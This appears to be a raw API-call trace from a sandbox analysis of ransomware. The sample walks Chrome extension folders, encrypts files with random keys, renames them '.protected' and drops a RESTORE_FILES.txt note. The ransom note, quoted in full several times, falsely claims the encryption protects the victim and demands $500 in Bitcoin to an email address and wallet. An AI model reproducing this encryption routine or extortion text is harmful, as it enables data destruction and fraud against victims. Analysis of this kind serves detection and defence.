-1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.562] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.562] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.562] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.562] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.563] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.563] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) 
returned 1 [0081.563] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.563] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.563] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.563] CloseHandle (hObject=0x168) returned 1 [0081.563] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0081.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0081.564] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.564] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.564] 
wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0081.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.565] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.565] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.565] lstrlenA (lpString="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") returned 684 [0081.566] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.566] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.566] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.566] CloseHandle (hObject=0x164) returned 1 [0081.566] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.566] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.566] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\RESTORE_FILES.txt") returned 156 [0081.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.566] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.566] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.567] lstrlenA (lpString="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") returned 684 [0081.567] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0081.567] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.567] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.568] CloseHandle (hObject=0x160) returned 1 [0081.568] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0081.568] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned 139 [0081.568] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0081.568] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0081.568] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*") returned 141 [0081.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0081.568] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.568] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.568] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.568] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.568] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\.") returned 141 [0081.568] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.568] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.568] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.568] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.568] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.568] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.568] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\..") returned 142 [0081.568] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.568] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.568] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0081.569] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0081.569] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0081.569] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0081.569] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0081.569] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0081.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0081.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0081.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0081.569] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2686, lpOverlapped=0x0) returned 1 [0081.656] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd97a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.656] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2686, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2686, lpOverlapped=0x0) returned 1 [0081.656] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.656] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0081.656] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0081.656] CloseHandle (hObject=0x164) returned 1 [0081.656] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.protected") returned 172 [0081.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.protected")) returned 1 [0081.657] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.657] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.657] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0081.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.658] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.658] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.659] lstrlenA (lpString="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") returned 684 [0081.659] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0081.659] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.659] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.659] CloseHandle (hObject=0x160) returned 1 [0081.659] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0081.659] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0081.659] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\RESTORE_FILES.txt") returned 147 [0081.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0081.660] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.660] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0081.661] lstrlenA 